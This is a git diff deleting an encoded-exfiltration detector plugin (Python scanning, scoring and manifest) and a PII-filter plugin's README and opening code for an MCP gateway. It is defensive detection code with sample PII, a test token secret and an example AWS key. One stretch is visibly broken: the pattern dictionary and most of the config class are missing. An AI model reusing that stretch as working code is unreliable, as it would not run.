-SPDX-License-Identifier: Apache-2.0 - -Encoded Exfiltration Detector Plugin. - -Detects suspicious encoded payloads (base64, base64url, hex, percent-encoding, -hex escapes) in prompt args and tool outputs, then blocks or redacts. - -Hooks: prompt_pre_fetch, tool_post_invoke, resource_post_fetch -""" - -# Future -from __future__ import annotations - -# Standard -import base64 -import binascii -import json -import logging -import math -import re -from typing import Any, Dict, Iterable, Tuple -from urllib.parse import unquote_to_bytes - -# Third-Party -from pydantic import BaseModel, Field, field_validator - -# First-Party -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - PluginViolation, - PromptPrehookPayload, - PromptPrehookResult, - ResourcePostFetchPayload, - ResourcePostFetchResult, - ToolPostInvokePayload, - ToolPostInvokeResult, -) - -logger = logging.getLogger(__name__) - -# Try to import Rust-accelerated implementation -try: - # Third-Party - from encoded_exfil_detection_rust.encoded_exfil_detection_rust import ExfilDetectorEngine as _RustEngine # pragma: no cover - from encoded_exfil_detection_rust.encoded_exfil_detection_rust import py_scan_container as encoded_exfil_detection # noqa: F401 — backward compat # pragma: no cover - - _RUST_AVAILABLE = True # pragma: no cover - logger.info("🦀 Rust encoded exfil detector available - using high-performance implementation") # pragma: no cover -except ImportError as e: - _RUST_AVAILABLE = False - _RustEngine = None # type: ignore - encoded_exfil_detection = None # type: ignore - logger.debug(f"Rust encoded exfil detector not available (will use Python): {e}") -except Exception as e: # pragma: no cover - defensive import guard - _RUST_AVAILABLE = False - _RustEngine = None # type: ignore - encoded_exfil_detection = None # type: ignore - logger.warning(f"Unexpected error loading Rust encoded exfil module: {e}", exc_info=True) - -# Precompiled detector patterns (minimum candidate length enforced in code) -_PATTERNS: Dict[str, re.Pattern[str]] = { - "base64": re.compile(r"(? list[str]: - """Validate that allowlist patterns are valid regexes.""" - for idx, pattern in enumerate(v): - try: - re.compile(pattern) - except re.error as exc: - raise ValueError(f"Invalid allowlist regex pattern at index {idx} ('{pattern}'): {exc}") from exc - return v - - def model_post_init(self, _context: Any) -> None: # pylint: disable=arguments-differ - """Pre-compile and cache derived values after validation.""" - setattr(self, "_allowlist_compiled", [re.compile(p) for p in self.allowlist_patterns]) - setattr(self, "_extra_keywords_bytes", tuple(kw.lower().encode() for kw in self.extra_sensitive_keywords)) - setattr(self, "_extra_hints_lower", tuple(h.lower() for h in self.extra_egress_hints)) - - -def _shannon_entropy(data: bytes) -> float: - """Calculate Shannon entropy for a byte sequence.""" - if not data: - return 0.0 - total = len(data) - counts: Dict[int, int] = {} - for value in data: - counts[value] = counts.get(value, 0) + 1 - entropy = 0.0 - for count in counts.values(): - probability = count / total - entropy -= probability * math.log2(probability) - return entropy - - -def _printable_ratio(data: bytes) -> float: - """Return ratio of printable ASCII characters in byte payload.""" - if not data: - return 0.0 - printable = sum(1 for b in data if 32 <= b <= 126 or b in (9, 10, 13)) - return printable / len(data) - - -def _normalize_padding(candidate: str) -> str: - """Normalize base64 padding to 4-byte alignment.""" - remainder = len(candidate) % 4 - if remainder == 0: - return candidate - return candidate + ("=" * (4 - remainder)) - - -def _decode_candidate(encoding: str, candidate: str) -> bytes | None: - """Decode a candidate encoded string, returning bytes if successful.""" - try: - if encoding == "base64": - return base64.b64decode(_normalize_padding(candidate), validate=True) - - if encoding == "base64url": - # validate URL-safe charset before decode for better precision - if not re.fullmatch(r"[A-Za-z0-9_\-=]+", candidate): - return None - return base64.urlsafe_b64decode(_normalize_padding(candidate)) - - if encoding == "hex": - if len(candidate) % 2 != 0: - return None - return bytes.fromhex(candidate) - - if encoding == "percent_encoding": - return unquote_to_bytes(candidate) - - if encoding == "escaped_hex": - chunks = re.findall(r"\\x([0-9A-Fa-f]{2})", candidate) - if not chunks: - return None - return bytes(int(chunk, 16) for chunk in chunks) - - except (binascii.Error, ValueError): - return None - - return None - - -def _contains_sensitive_keywords(decoded: bytes, extra_keywords: tuple[bytes, ...] = ()) -> bool: - """Return True when decoded payload contains likely sensitive markers.""" - lowered = decoded.lower() - keywords = _SENSITIVE_KEYWORDS + extra_keywords - return any(keyword in lowered for keyword in keywords) - - -def _has_egress_context(text: str, start: int, end: int, radius: int = 80, extra_hints: tuple[str, ...] = ()) -> bool: - """Inspect nearby text around candidate for egress/exfiltration hints.""" - lower_text = text.lower() - left = max(0, start - radius) - right = min(len(lower_text), end + radius) - window = lower_text[left:right] - hints = _EGRESS_HINTS + extra_hints - return any(hint in window for hint in hints) - - -def _apply_redactions(text: str, findings: Iterable[dict[str, Any]], replacement: str) -> str: - """Apply non-overlapping redactions from end to start to preserve offsets.""" - redacted = text - spans = sorted({(f["start"], f["end"]) for f in findings}, key=lambda item: (item[0], item[1])) - for start, end in reversed(spans): - redacted = f"{redacted[:start]}{replacement}{redacted[end:]}" - return redacted - - -def _evaluate_candidate( - text: str, - path: str, - encoding: str, - candidate: str, - start: int, - end: int, - cfg: EncodedExfilDetectorConfig, - extra_keywords: tuple[bytes, ...] = (), - extra_hints: tuple[str, ...] = (), -) -> dict[str, Any] | None: - """Score and classify a candidate encoded segment.""" - if len(candidate) < cfg.min_encoded_length: - return None - - decoded = _decode_candidate(encoding, candidate) - if decoded is None or len(decoded) < cfg.min_decoded_length: - return None - - entropy = _shannon_entropy(decoded) - printable = _printable_ratio(decoded) - sensitive_hit = _contains_sensitive_keywords(decoded, extra_keywords=extra_keywords) - egress_hit = _has_egress_context(text, start, end, extra_hints=extra_hints) - - score = 1 # baseline for successfully decoded segment - reasons: list[str] = ["decodable"] - - if entropy >= cfg.min_entropy: - score += 1 - reasons.append("high_entropy") - - if printable >= cfg.min_printable_ratio: - score += 1 - reasons.append("printable_payload") - - if sensitive_hit: - score += 2 - reasons.append("sensitive_keywords") - - if egress_hit: - score += 1 - reasons.append("egress_context") - - if len(candidate) >= cfg.min_encoded_length * 2: - score += 1 - reasons.append("long_segment") - - threshold = cfg.per_encoding_score.get(encoding, cfg.min_suspicion_score) - if score < threshold: - return None - - preview = candidate[:24] + "…" if len(candidate) > 24 else candidate - return { - "type": "encoded_exfiltration", - "encoding": encoding, - "path": path or "$", - "start": start, - "end": end, - "score": score, - "entropy": round(entropy, 3), - "decoded_len": len(decoded), - "printable_ratio": round(printable, 3), - "reason": reasons, - "match": preview, - } - - -def _scan_text( - text: str, - cfg: EncodedExfilDetectorConfig, - path: str = "", - decode_depth: int = 0, -) -> tuple[str, list[dict[str, Any]]]: - """Scan a single text value and optionally redact suspicious segments.""" - if not text or len(text) > cfg.max_scan_string_length: - return text, [] - - findings_by_span: Dict[Tuple[int, int], dict[str, Any]] = {} - - for encoding, pattern in _PATTERNS.items(): - if not cfg.enabled.get(encoding, True): - continue - - for match in pattern.finditer(text): - candidate = match.group(0) - - # Check allowlist — skip candidates matching any allowlist pattern - if cfg._allowlist_compiled: - if any(ap.search(candidate) for ap in cfg._allowlist_compiled): - continue - - finding = _evaluate_candidate( - text=text, - path=path, - encoding=encoding, - candidate=candidate, - start=match.start(), - end=match.end(), - cfg=cfg, - extra_keywords=cfg._extra_keywords_bytes, - extra_hints=cfg._extra_hints_lower, - ) - - # Try nested decoding — peel encoding layers to find deeper secrets - if decode_depth < cfg.max_decode_depth - 1: - decoded = _decode_candidate(encoding, candidate) - if decoded is not None and len(decoded) >= cfg.min_decoded_length: - decoded_text = decoded.decode("utf-8", errors="replace") - _, nested_findings = _scan_text( - decoded_text, - cfg, - path=path, - decode_depth=decode_depth + 1, - ) - for nf in nested_findings: - # Use nested finding if it has a higher score than the outer one - if finding is None or nf["score"] > finding["score"]: - finding = {**nf, "start": match.start(), "end": match.end()} - - if finding is None: - continue - - key = (finding["start"], finding["end"]) - existing = findings_by_span.get(key) - if existing is None or finding["score"] > existing["score"]: - findings_by_span[key] = finding - - if len(findings_by_span) >= cfg.max_findings_per_value: - break - - findings = sorted(findings_by_span.values(), key=lambda item: (item["start"], item["end"])) - if not findings or not cfg.redact: - return text, findings - - return _apply_redactions(text, findings, cfg.redaction_text), findings - - -def _scan_container( - container: Any, - cfg: EncodedExfilDetectorConfig, - path: str = "", - use_rust: bool = True, - _depth: int = 0, -) -> tuple[int, Any, list[dict[str, Any]]]: - """Recursively scan container for encoded exfiltration patterns.""" - if _depth > cfg.max_recursion_depth: - return 0, container, [] - - if use_rust and _RUST_AVAILABLE and encoded_exfil_detection is not None: # pragma: no cover - Rust path - try: - count, redacted, findings = encoded_exfil_detection(container, cfg) - normalized_findings = [] - for finding in findings: - if isinstance(finding, dict): - if "path" not in finding: - finding["path"] = path or "$" - normalized_findings.append(finding) - return int(count), redacted, normalized_findings - except Exception as e: # pragma: no cover - fallback path safety - logger.warning(f"Rust encoded exfil scan failed, falling back to Python: {e}") - - if isinstance(container, str): - # Scan as raw text first — always returns the original type (string) - redacted, findings = _scan_text(container, cfg, path=path) - # Try parsing string as JSON for additional findings (metadata only, no type mutation) - # Heuristic: only attempt JSON parse if string starts with { or [ and is within size limit - if cfg.parse_json_strings and _depth < cfg.max_recursion_depth and len(container) <= cfg.max_scan_string_length and len(container) >= 2 and container[0] in ("{", "["): - try: - parsed = json.loads(container) - if isinstance(parsed, (dict, list)): - json_path = f"{path}(json)" if path else "(json)" - _, _, json_findings = _scan_container(parsed, cfg, path=json_path, use_rust=False, _depth=_depth + 1) - # Deduplicate: only add JSON findings whose encoded match isn't already found in raw scan - raw_matches = {f.get("match") for f in findings} - for jf in json_findings: - if jf.get("match") not in raw_matches: - findings.append(jf) - except (json.JSONDecodeError, ValueError): - pass - return len(findings), redacted, findings - - if isinstance(container, dict): - total = 0 - findings: list[dict[str, Any]] = [] - updated: dict[str, Any] = {} - for key, value in container.items(): - child_path = f"{path}.{key}" if path else str(key) - # Scan keys that are long enough to contain encoded content - if isinstance(key, str) and len(key) >= cfg.min_encoded_length: - key_path = f"{child_path}(key)" - _, key_findings = _scan_text(key, cfg, path=key_path) - findings.extend(key_findings) - total += len(key_findings) - count, new_value, child_findings = _scan_container(value, cfg, path=child_path, use_rust=False, _depth=_depth + 1) - total += count - findings.extend(child_findings) - updated[key] = new_value - return total, updated, findings - - if isinstance(container, list): - total = 0 - findings = [] - updated_list: list[Any] = [] - for index, value in enumerate(container): - child_path = f"{path}[{index}]" if path else f"[{index}]" - count, new_value, child_findings = _scan_container(value, cfg, path=child_path, use_rust=False, _depth=_depth + 1) - total += count - findings.extend(child_findings) - updated_list.append(new_value) - return total, updated_list, findings - - return 0, container, [] - - -class EncodedExfilDetectorPlugin(Plugin): - """Detect and mitigate suspicious encoded exfiltration payloads.""" - - def __init__(self, config: PluginConfig) -> None: - """Initialize encoded exfiltration detector plugin. - - Args: - config: Plugin configuration. - """ - super().__init__(config) - self._cfg = EncodedExfilDetectorConfig(**(config.config or {})) - - # Try to create persistent Rust engine (parses config once, reuses across scans) - self._rust_engine = None - if _RUST_AVAILABLE and _RustEngine is not None: # pragma: no cover - Rust path - try: - self._rust_engine = _RustEngine(self._cfg) - except Exception as e: # pragma: no cover - defensive init guard - logger.warning(f"Failed to initialize Rust exfil engine, using Python fallback: {e}") - self.implementation = "Rust" if self._rust_engine is not None else "Python" - - def _findings_for_metadata(self, findings: list[dict[str, Any]]) -> list[dict[str, Any]]: - """Return sanitized findings details for metadata emission.""" - if self._cfg.include_detection_details: - return findings[:10] - return [{"encoding": f.get("encoding"), "path": f.get("path"), "score": f.get("score")} for f in findings[:10]] - - def _scan(self, container: Any, path: str = "") -> tuple[int, Any, list[dict[str, Any]]]: - """Run the scanner with plugin-level configuration.""" - if self._rust_engine is not None: # pragma: no cover - Rust path - try: - count, redacted, findings = self._rust_engine.scan(container) - normalized = [] - for f in findings: - if isinstance(f, dict): - if "path" not in f: - f["path"] = path or "$" - normalized.append(f) - return int(count), redacted, normalized - except Exception as e: # pragma: no cover - fallback path safety - logger.warning(f"Rust engine scan failed, falling back to Python: {e}") - return _scan_container(container, self._cfg, path=path, use_rust=False) - - def _log_detection(self, hook: str, count: int, findings: list[dict[str, Any]], context: PluginContext) -> None: - """Log detection events without exposing sensitive content.""" - if not self._cfg.log_detections or count == 0: - return - encoding_types = sorted({f.get("encoding", "unknown") for f in findings}) - request_id = context.global_context.request_id if context and context.global_context else "unknown" - logger.warning("Encoded exfiltration detected [hook=%s, count=%d, encodings=%s, request_id=%s]", hook, count, encoding_types, request_id) - - async def prompt_pre_fetch(self, payload: PromptPrehookPayload, context: PluginContext) -> PromptPrehookResult: - """Scan prompt arguments for encoded exfiltration attempts.""" - count, new_args, findings = self._scan(payload.args or {}, path="args") - self._log_detection("prompt_pre_fetch", count, findings, context) - - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return PromptPrehookResult( - continue_processing=False, - violation=PluginViolation( - reason="Encoded exfiltration pattern detected", - description="Suspicious encoded payload detected in prompt arguments", - code="ENCODED_EXFIL_DETECTED", - details={ - "count": count, - "examples": self._findings_for_metadata(findings), - "implementation": self.implementation, - "request_id": context.global_context.request_id if context and context.global_context else None, - }, - ), - ) - - metadata = {"encoded_exfil_count": count, "encoded_exfil_findings": self._findings_for_metadata(findings), "implementation": self.implementation} if count else {} - - if self._cfg.redact and new_args != (payload.args or {}): - modified_payload = PromptPrehookPayload(prompt_id=payload.prompt_id, args=new_args) - metadata = {**metadata, "encoded_exfil_redacted": True} - return PromptPrehookResult(modified_payload=modified_payload, metadata=metadata) - - return PromptPrehookResult(metadata=metadata) - - async def tool_post_invoke(self, payload: ToolPostInvokePayload, context: PluginContext) -> ToolPostInvokeResult: - """Scan tool outputs for suspicious encoded exfiltration payloads.""" - count, new_result, findings = self._scan(payload.result, path="result") - self._log_detection("tool_post_invoke", count, findings, context) - - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return ToolPostInvokeResult( - continue_processing=False, - violation=PluginViolation( - reason="Encoded exfiltration pattern detected", - description=f"Suspicious encoded payload detected in tool output '{payload.name}'", - code="ENCODED_EXFIL_DETECTED", - details={ - "tool": payload.name, - "count": count, - "examples": self._findings_for_metadata(findings), - "implementation": self.implementation, - "request_id": context.global_context.request_id if context and context.global_context else None, - }, - ), - ) - - metadata = {"encoded_exfil_count": count, "encoded_exfil_findings": self._findings_for_metadata(findings), "implementation": self.implementation} if count else {} - - if self._cfg.redact and new_result != payload.result: - modified_payload = ToolPostInvokePayload(name=payload.name, result=new_result) - metadata = {**metadata, "encoded_exfil_redacted": True} - return ToolPostInvokeResult(modified_payload=modified_payload, metadata=metadata) - - return ToolPostInvokeResult(metadata=metadata) - - async def resource_post_fetch(self, payload: ResourcePostFetchPayload, context: PluginContext) -> ResourcePostFetchResult: - """Scan fetched resource content for suspicious encoded exfiltration payloads.""" - count, new_content, findings = self._scan(payload.content, path="content") - self._log_detection("resource_post_fetch", count, findings, context) - - if count >= self._cfg.min_findings_to_block and self._cfg.block_on_detection: - return ResourcePostFetchResult( - continue_processing=False, - violation=PluginViolation( - reason="Encoded exfiltration pattern detected", - description="Suspicious encoded payload detected in resource content", - code="ENCODED_EXFIL_DETECTED", - details={ - "uri": payload.uri, - "count": count, - "examples": self._findings_for_metadata(findings), - "implementation": self.implementation, - "request_id": context.global_context.request_id if context and context.global_context else None, - }, - ), - ) - - metadata = {"encoded_exfil_count": count, "encoded_exfil_findings": self._findings_for_metadata(findings), "implementation": self.implementation} if count else {} - - if self._cfg.redact and new_content != payload.content: - modified_payload = ResourcePostFetchPayload(uri=payload.uri, content=new_content) - metadata = {**metadata, "encoded_exfil_redacted": True} - return ResourcePostFetchResult(modified_payload=modified_payload, metadata=metadata) - - return ResourcePostFetchResult(metadata=metadata) - - -__all__ = [ - "EncodedExfilDetectorConfig", - "EncodedExfilDetectorPlugin", - "_scan_container", - "_scan_text", -] diff --git a/plugins/encoded_exfil_detection/plugin-manifest.yaml b/plugins/encoded_exfil_detection/plugin-manifest.yaml deleted file mode 100644 index bb1a7e1269..0000000000 --- a/plugins/encoded_exfil_detection/plugin-manifest.yaml +++ /dev/null @@ -1,33 +0,0 @@ -description: "Detects suspicious encoded payload exfiltration patterns (base64/base64url/hex/percent/escaped hex) in prompts, tool outputs, and resources" -author: "Mihai Criveti" -version: "0.2.0" -tags: ["security", "exfiltration", "dlp", "encoding"] -available_hooks: - - "prompt_pre_fetch" - - "tool_post_invoke" - - "resource_post_fetch" -default_config: - enabled: - base64: true - base64url: true - hex: true - percent_encoding: true - escaped_hex: true - min_encoded_length: 24 - min_decoded_length: 12 - min_entropy: 3.3 - min_printable_ratio: 0.70 - min_suspicion_score: 3 - max_scan_string_length: 200000 - max_findings_per_value: 50 - redact: false - redaction_text: "***ENCODED_REDACTED***" - block_on_detection: true - min_findings_to_block: 1 - include_detection_details: true - allowlist_patterns: [] - extra_sensitive_keywords: [] - extra_egress_hints: [] - max_decode_depth: 2 - max_recursion_depth: 32 - log_detections: true diff --git a/plugins/pii_filter/README.md b/plugins/pii_filter/README.md deleted file mode 100644 index 4aeadaf6e2..0000000000 --- a/plugins/pii_filter/README.md +++ /dev/null @@ -1,377 +0,0 @@ -# PII Filter Plugin for ContextForge - -> Author: Mihai Criveti -> Version: 0.1.0 - -A plugin for detecting and masking Personally Identifiable Information (PII) in ContextForge prompts and responses. - -## Features - -### PII Detection Types -- **Social Security Numbers (SSN)** - US format (123-45-6789 or 123456789) -- **Credit Card Numbers** - Major card formats with various separators -- **Email Addresses** - Standard email format validation -- **Phone Numbers** - US and international formats -- **IP Addresses** - IPv4 and IPv6 -- **Dates of Birth** - Various date formats with context -- **Passport Numbers** - International passport formats -- **Driver's License Numbers** - US state formats -- **Bank Account Numbers** - Including IBAN -- **Medical Record Numbers** - MRN formats -- **Custom Patterns** - Define your own PII patterns - -Secret-style credentials such as AWS keys and generic API tokens are handled by the `secrets_detection` plugin, not the PII filter. - -### Masking Strategies -- **REDACT** - Complete replacement with `[REDACTED]` or custom text -- **PARTIAL** - Show partial info (e.g., `***-**-1234` for SSN, `j***e@example.com` for email) -- **HASH** - Replace with a deterministic SHA-256-derived placeholder such as `[HASH:8f434346648f6b96]` -- **TOKENIZE** - Replace with unique token for reversibility -- **REMOVE** - Complete removal of PII - -### Operating Modes -- **ENFORCE** - Block or mask PII (based on configuration) -- **PERMISSIVE** - Log detections but don't block -- **DISABLED** - Turn off the plugin - -## Installation - -1. Copy .env.example .env -2. Enable plugins in `.env` -3. Add the plugin configuration to `plugins/config.yaml`: - -```yaml -plugins: - - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" - description: "Detects and masks Personally Identifiable Information" - version: "1.0" - author: "Security Team" - hooks: ["prompt_pre_fetch", "prompt_post_fetch"] - tags: ["security", "pii", "compliance", "filter", "gdpr", "hipaa"] - mode: "enforce" # enforce | permissive | disabled - priority: 10 # Lower number = higher priority (runs first) - conditions: - - prompts: [] # Empty list = apply to all prompts - server_ids: [] # Apply to all servers - tenant_ids: [] # Apply to all tenants - config: - # PII Detection Settings - detect_ssn: true - detect_credit_card: true - detect_email: true - detect_phone: true - detect_ip_address: true - # Masking Settings - default_mask_strategy: "partial" - redaction_text: "[PII_REDACTED]" - # Behavior Settings - block_on_detection: false - log_detections: true - include_detection_details: true - # Whitelist patterns - whitelist_patterns: - - "test@example.com" - - "555-555-5555" -``` - -## Configuration Examples - -### Development Environment (Permissive) -```yaml -config: - mode: "permissive" # Only log, don't block - detect_email: false # Allow emails in dev - detect_phone: false # Allow phones in dev - default_mask_strategy: "partial" # Show partial info for debugging - block_on_detection: false -``` - -### Production Environment (Strict Compliance) -```yaml -config: - mode: "enforce" - block_on_detection: true # Block any request with PII - default_mask_strategy: "redact" # Complete redaction - log_detections: true - detect_ssn: true - detect_credit_card: true - detect_email: true - # ... enable all detection types -``` - -### PII Only -```yaml -config: - detect_ssn: false - detect_credit_card: false - detect_email: false - detect_phone: false - detect_ip_address: true - block_on_detection: true - default_mask_strategy: "redact" -``` - -## SSN Detection Notes - -- SSNs do not have a public checksum comparable to Luhn. Local pattern checks can only determine whether a value looks like an SSN, not whether it is assigned to a real person. -- Authoritative SSN verification requires identity-aware SSA-backed verification, not standalone checksum validation. -- The current Rust detector may classify bare 9-digit values as SSNs. This can create false positives for other 9-digit identifiers when `detect_ssn` is enabled. -- A future hardening pass should keep broad compact-SSN support but reject structurally impossible SSNs instead of requiring an `SSN` label. - -### Structural Validation Limits - -The planned structural hardening should reject values that violate SSA invalid-number rules: - -- The first three digits cannot be `000`, `666`, or `900-999` -- The middle two digits cannot be `00` -- The last four digits cannot be `0000` - -These checks reduce false positives, but they still cannot prove a value is a real SSN. - -## Testing - -### Run All Tests -```bash -# Run all PII filter tests -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py -v - -# Run with coverage -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py --cov=plugins.pii_filter --cov-report=term-missing -``` - -### Run Specific Test Classes -```bash -# Test only the detector functionality -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py::TestPIIDetector -v - -# Test only the plugin integration -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py::TestPIIFilterPlugin -v -``` - -### Run Individual Tests -```bash -# Test SSN detection -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py::TestPIIDetector::test_ssn_detection -v - -# Test masking strategies -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py::TestPIIDetector::test_masking_strategies -v - -# Test blocking mode -pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py::TestPIIFilterPlugin::test_prompt_pre_fetch_blocking -v -``` - -### Manual Testing with the Gateway - -1. Enable the plugin in your `.env`: -```bash -PLUGINS_ENABLED=true -``` - -2. Start the gateway. - Direct app port defaults to `http://localhost:4444`; the compose stack is typically exposed through nginx at `http://localhost:8080`. -```bash -python -m mcpgateway.main -``` - -3. Test with curl: -```bash -# Test PII detection in prompt arguments -curl -X POST http://localhost:4444/prompts/test_prompt \ - -H "Content-Type: application/json" \ - -d '{ - "arguments": { - "user_input": "My SSN is 123-45-6789 and email is john@example.com" - } - }' - -# Response should have masked PII: -# "user_input": "My SSN is ***-**-6789 and email is j***n@example.com" -``` - -### Test Custom Patterns - -Add custom patterns in your config: -```yaml -config: - custom_patterns: - - type: "custom" - pattern: "\\bEMP\\d{6}\\b" - description: "Employee ID" - mask_strategy: "redact" - enabled: true -``` - -**Custom Pattern Complexity Limits (DoS Prevention):** - -To prevent Regular Expression Denial of Service (ReDoS) attacks, custom patterns are subject to the following limits: -- **Maximum pattern length:** 256 characters -- **Maximum alternations (`|`):** 16 -- **Maximum quantifiers (`*`, `+`, `?`, `{}`):** 24 - -Custom patterns are expected to be written by trusted operators in plugin configuration, not supplied by end users at request time. The Rust detector uses the `regex` crate's linear-time matching engine, and these limits add extra guardrails for maintainability and compilation cost. Patterns exceeding these limits will be rejected during configuration validation. - -Test the custom pattern: -```python -from plugins.pii_filter.pii_filter import PIIFilterPlugin, PIIFilterConfig, PIIDetector - -config = PIIFilterConfig( - custom_patterns=[{ - "type": "custom", - "pattern": r"\bEMP\d{6}\b", - "description": "Employee ID", - "mask_strategy": "redact", - "enabled": True - }] -) -detector = PIIDetector(config) - -text = "Employee ID: EMP123456" -detections = detector.detect(text) -masked = detector.mask(text, detections) -print(masked) # Output: "Employee ID: [REDACTED]" -``` - -## Debugging - -### Enable Debug Logging -```python -import logging -logging.basicConfig(level=logging.DEBUG) - -# The plugin will log all PII detections -logger = logging.getLogger("plugins.pii_filter.pii_filter") -logger.setLevel(logging.DEBUG) -``` - -### Check Detection Results -```python -from plugins.pii_filter.pii_filter import PIIDetector, PIIFilterConfig - -config = PIIFilterConfig(detect_ssn=True, detect_email=True) -detector = PIIDetector(config) - -text = "SSN: 123-45-6789, Email: test@example.com" -detections = detector.detect(text) - -# Inspect what was detected -for pii_type, items in detections.items(): - print(f"Type: {pii_type}") - for item in items: - print(f" - Value: {item['value']}") - print(f" - Position: {item['start']}-{item['end']}") - print(f" - Strategy: {item['mask_strategy']}") -``` - -## Common Issues and Solutions - -### Issue: PII not being detected -**Solution**: Check that the specific detection type is enabled in config: -```yaml -config: - detect_ssn: true # Make sure this is true - detect_email: true -``` - -### Issue: False positives (detecting non-PII) -**Solution**: Use whitelist patterns: -```yaml -config: - whitelist_patterns: - - "test@example.com" - - "555-555-5555" - - "000-00-0000" -``` - -### Issue: Overlapping detections -**Solution**: The plugin automatically handles overlapping patterns by keeping only the first match. If you need different behavior, adjust pattern priorities or use custom patterns. - -### Issue: Plugin not running -**Solution**: Verify: -1. `PLUGINS_ENABLED=true` in `.env` -2. Plugin priority is set correctly (lower number = runs first) -3. Plugin mode is not set to "disabled" -4. Conditions match your prompts/servers - -## Performance Considerations - -- **Pattern Compilation**: Patterns are compiled once during initialization -- **Detection Speed**: O(n*m) where n = text length, m = number of patterns -- **Memory Usage**: Minimal - only stores compiled patterns and current detections -- **Caching**: No caching by default (stateless detection) - -## Security Best Practices - -1. **Production Settings**: - - Always use `mode: "enforce"` in production - - Enable `block_on_detection: true` for sensitive environments - - Use `default_mask_strategy: "redact"` for complete removal - -2. **Logging**: - - Enable `log_detections: true` for audit trails - - Monitor logs for PII detection patterns - - Never log the actual PII values - -3. **Testing**: - - Test with realistic data patterns - - Verify whitelist patterns don't expose real PII - - Regularly update patterns for new PII formats - - -## Sample Prompt - -Here's a prompt that trips the checks: - -```text -Personal Info: -SSN: 123-45-6789 or 987654321 -Email: john@example.com -Phone: (555) 123-4567 or +1-800-555-0199 -DOB: 01/15/1985 -``` - -## CURL Command to Test - -```bash -export MCPGATEWAY_BEARER_TOKEN=$(python3 -m mcpgateway.utils.create_jwt_token -u admin@example.com --secret my-test-key-but-now-longer-than-32-bytes) - -# Then test with a prompt containing various PII -curl -X POST "http://localhost:4444/prompts/test_prompt" \ - -H "Authorization: Bearer $MCPGATEWAY_BEARER_TOKEN" \ - -H "Content-Type: application/json" \ - -d '{ - "arguments": { - "user_input": "My SSN is 123-45-6789 and email is john@example.com. Credit card: 4111-1111-1111-1111, phone (555) 123-4567. Server IP: 192.168.1.1, AWS Key: AKIAIOSFODNN7EXAMPLE" - } - }' -``` - -## Contributing - -To add new PII detection patterns: - -1. Add the pattern to `_compile_patterns()` method: -```python -if self.config.detect_my_pattern: - patterns.append(PIIPattern( - type=PIIType.MY_PATTERN, - pattern=r'your-regex-here', - description="Description", - mask_strategy=MaskingStrategy.REDACT - )) -``` - -2. Add configuration option to `PIIFilterConfig`: -```python -detect_my_pattern: bool = Field(default=True, description="Detect my pattern") -``` - -3. Add tests to verify detection and masking - -## License - -Apache-2.0 - -## Support - -For issues or questions, please open an issue in ContextForge repository. diff --git a/plugins/pii_filter/__init__.py b/plugins/pii_filter/__init__.py deleted file mode 100644 index 36761cce8f..0000000000 --- a/plugins/pii_filter/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# -*- coding: utf-8 -*- -"""Module Description. -Location: ./plugins/pii_filter/__init__.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Module documentation... -""" diff --git a/plugins/pii_filter/pii_filter.py b/plugins/pii_filter/pii_filter.py deleted file mode 100644 index c7aee52a19..0000000000 --- a/plugins/pii_filter/pii_filter.py +++ /dev/null @@ -1,897 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/pii_filter/pii_filter.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -PII Filter Plugin for ContextForge. -This plugin detects and masks Personally Identifiable Information (PII) in prompts -and their responses, including SSNs, credit cards, emails, phone numbers, and more. -""" - -# Standard -from enum import Enum -import logging -import re -from typing import Any, Dict, List, Pattern, Tuple - -# Third-Party -import orjson -from pydantic import BaseModel, Field - -# First-Party -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - PluginViolation, - PromptPosthookPayload, - PromptPosthookResult, - PromptPrehookPayload, - PromptPrehookResult, - ToolPostInvokePayload, - ToolPostInvokeResult, - ToolPreInvokePayload, - ToolPreInvokeResult, -) -from mcpgateway.services.logging_service import LoggingService - -# Initialize logging service first -logging_service = LoggingService() -logger = logging_service.get_logger(__name__) - -# Try to import Rust-accelerated implementation -_RUST_AVAILABLE = False -_RustPIIDetector = None - -try: - # Import from installed Rust package (two-level deep call) - from pii_filter_rust.pii_filter_rust import PIIDetectorRust as _RustPIIDetector - - _RUST_AVAILABLE = True - logger.info("🦀 Rust PII filter available - using high-performance implementation (5-100x speedup)") -except ImportError as e: - logger.debug(f"Rust PII filter not available (will use Python): {e}") - _RUST_AVAILABLE = False -except Exception as e: - logger.warning(f"⚠️ Unexpected error loading Rust module: {e}", exc_info=True) - _RUST_AVAILABLE = False - - -_PYTHON_PLUGIN_DEPRECATION_MESSAGE = ( - "The legacy Python PII filter detector is deprecated and will be removed in a future release. Install the Rust-backed `pii_filter_rust` package to keep the PII filter plugin enabled." -) - - -class PIIType(str, Enum): - """Types of PII that can be detected.""" - - SSN = "ssn" - BSN = "bsn" - CREDIT_CARD = "credit_card" - EMAIL = "email" - PHONE = "phone" - IP_ADDRESS = "ip_address" - DATE_OF_BIRTH = "date_of_birth" - PASSPORT = "passport" - DRIVER_LICENSE = "driver_license" - BANK_ACCOUNT = "bank_account" - MEDICAL_RECORD = "medical_record" - CUSTOM = "custom" - - -class MaskingStrategy(str, Enum): - """Strategies for masking detected PII.""" - - REDACT = "redact" # Replace with [REDACTED] - PARTIAL = "partial" # Show partial info (e.g., ***-**-1234) - HASH = "hash" # Replace with hash - TOKENIZE = "tokenize" # Replace with token - REMOVE = "remove" # Remove entirely - - -class PIIPattern(BaseModel): - """Configuration for a PII pattern.""" - - type: PIIType - pattern: str - description: str - mask_strategy: MaskingStrategy = MaskingStrategy.REDACT - 